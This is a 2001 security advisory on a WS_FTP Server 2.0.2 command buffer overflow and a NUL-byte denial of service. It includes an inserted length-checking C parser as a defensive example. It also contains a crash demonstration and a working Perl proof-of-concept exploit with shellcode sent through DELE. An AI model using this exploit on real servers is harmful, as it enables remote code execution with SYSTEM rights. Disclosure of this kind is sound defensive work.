[NT] WS_FTP Server Buffer Overflow and Possible DoS
From: support@securiteam.com  Date: 07/26/01
From: support@securiteam.com To: list@securiteam.com Subject: [NT] WS_FTP Server Buffer Overflow and Possible DoS Message-Id: <20010726193304.C02B8138C4@mail.der-keiler.de> Date: Thu, 26 Jul 2001 21:33:04 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
WS_FTP Server Buffer Overflow and Possible DoS
------------------------------------------------------------------------
SUMMARY
<http://www.ipswitch.com/products/WS_FTP-Server/index.html> WS_FTP Server
is a high-powered, easy-to-use FTP (File Transfer Protocol) server for
Windows NT/2000. It allows you to securely share files and folders with
customers, vendors, colleagues, and others over the Internet.
Several security vulnerabilities in the product allow attackers to execute
arbitrary code on the server by means of a buffer overflow.
DETAILS
Vulnerable systems:
WS_FTP Server version 2.0.2
Immune systems:
WS_FTP Server version 2.0.3
WS_FTP Server contains a buffer overflow that affects the following
commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on the
target with SYSTEM RIGHTS, because the server runs as a service by
default. Note that this is only valid when logged in as an anonymous user,
not an ordinary one.
The server also suffers from an easy-to-trigger Denial of Service
condition.
Command Buffer Overrun
All the above-mentioned commands appear to share the same parsing code, which
suffers from a buffer overflow. Sending one of these commands with an argument
longer than 478 bytes (474 bytes to fill the buffer plus a 4-byte return
address) overflows the buffer and overwrites EIP. A proof-of-concept exploit
is attached to the advisory; it works against WS_FTP Server 2.0.2 running on
Windows 2000 (Professional and Server, any service pack).
C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
Possible DoS
By sending a couple of NULL (0x00) characters, the WS_FTP Server will
spike at 100% CPU.
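The two defects described above, an argument copied into a fixed buffer without a length check and a command line that the server cannot cope with once it contains NUL bytes, are closed by the same small piece of parsing discipline: treat the received line as (pointer, length) and compare the argument length against the destination size before copying. The C program below is an added example written for this page, not WS_FTP Server or Ipswitch code; FTP_ARG_MAX, the function names and the constructed input lines are assumptions of the example, and the 478-byte argument it feeds the parser is simply the length the advisory gives.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not WS_FTP code): a length-checked FTP command parser.
 * - The argument is copied only after its length is compared with the
 *   destination buffer, so an over-long DELE argument is rejected instead
 *   of overwriting the saved return address.
 * - The line is handled by explicit length, so embedded NUL bytes are
 *   detected instead of silently truncating the command.
 * FTP_ARG_MAX is a limit assumed for this example, not a WS_FTP value. */
#define FTP_VERB_MAX 8      /* longest RFC 959 verb is 4 chars; room for NUL */
#define FTP_ARG_MAX  255    /* assumed: ample for a path, far below 474 */

enum ftp_verdict {
    FTP_OK = 0,
    FTP_ERR_EMPTY,       /* no command on the line */
    FTP_ERR_NUL,         /* NUL byte inside the received line */
    FTP_ERR_VERB_LONG,   /* verb longer than any FTP command */
    FTP_ERR_ARG_LONG     /* argument would not fit the bounded buffer */
};

struct ftp_cmd {
    char verb[FTP_VERB_MAX];
    char arg[FTP_ARG_MAX + 1];
};

/* Parse exactly `len` bytes as received from the socket (CRLF optional). */
enum ftp_verdict ftp_parse(const unsigned char *buf, size_t len,
                           struct ftp_cmd *out)
{
    size_t i, arglen;

    memset(out, 0, sizeof *out);
    if (len == 0)
        return FTP_ERR_EMPTY;
    /* Scan the full received length, not strlen(): a NUL must not shorten it. */
    if (memchr(buf, 0, len) != NULL)
        return FTP_ERR_NUL;
    if (buf[len - 1] == '\n') len--;                /* strip LF */
    if (len > 0 && buf[len - 1] == '\r') len--;     /* strip CR */
    if (len == 0)
        return FTP_ERR_EMPTY;

    /* Verb: everything up to the first space, upper-cased, bounded. */
    for (i = 0; i < len && buf[i] != ' '; i++) {
        if (i >= FTP_VERB_MAX - 1)
            return FTP_ERR_VERB_LONG;
        out->verb[i] = (char)toupper(buf[i]);
    }
    while (i < len && buf[i] == ' ')
        i++;                                        /* skip separator */

    /* Argument: the length check happens BEFORE the copy. */
    arglen = len - i;
    if (arglen > FTP_ARG_MAX)
        return FTP_ERR_ARG_LONG;
    memcpy(out->arg, buf + i, arglen);
    out->arg[arglen] = '\0';
    return FTP_OK;
}

/* Constructed input: "DELE " + n bytes of 'A' + CRLF, as in the netcat
 * session above; returns the parser's verdict for that line. */
enum ftp_verdict ftp_verdict_for_arg_len(size_t n)
{
    struct ftp_cmd cmd;
    enum ftp_verdict v;
    size_t len = 5 + n + 2;
    unsigned char *line = malloc(len);
    if (line == NULL)
        return FTP_ERR_EMPTY;
    memcpy(line, "DELE ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 2);
    v = ftp_parse(line, len, &cmd);
    free(line);
    return v;
}

/* Constructed input for the DoS case: a command line containing NUL bytes. */
enum ftp_verdict ftp_nul_verdict(void)
{
    static const unsigned char line[] = "DELE \0\0\r\n";  /* 9 bytes */
    struct ftp_cmd cmd;
    return ftp_parse(line, sizeof line - 1, &cmd);
}

int main(void)
{
    struct ftp_cmd cmd;
    const char *ok = "user ftp\r\n";
    if (ftp_parse((const unsigned char *)ok, strlen(ok), &cmd) == FTP_OK)
        printf("verb=%s arg=%s\n", cmd.verb, cmd.arg);
    printf("478-byte DELE argument -> %d (ARG_LONG is %d)\n",
           ftp_verdict_for_arg_len(478), FTP_ERR_ARG_LONG);
    printf("NUL bytes in line -> %d (NUL is %d)\n",
           ftp_nul_verdict(), FTP_ERR_NUL);
    return 0;
}
```

Compiled stand-alone, the program accepts a normal `user ftp` line, then rejects a DELE with a 478-byte argument and a line carrying NUL bytes before any byte is copied into the fixed buffer. The same two predicates, an argument above a length threshold for the listed verbs and NUL bytes on the FTP control channel, are also what a network IDS rule or control-channel log check for this advisory should match on.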
Workaround:
Download the new version from:
<http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html>
Exploit:
#!/usr/local/bin/perl
##############################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
##############################################################
$login="ftp"; #username
$pass="ftp"; #password
##############################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
print "It creates a file named defcom.iyd in the c-root\n";
print "(C)2001 andreas\@defcom.com\n";
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit =
"\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit .
"\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit .
"\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit .
"\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) .
"\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 .
"\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;
ADDITIONAL INFORMATION
The information has been provided by <mailto:andreas@defcom.com> Andreas
Junestam and <mailto:janne@defcom.com> Janne Sarendal.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.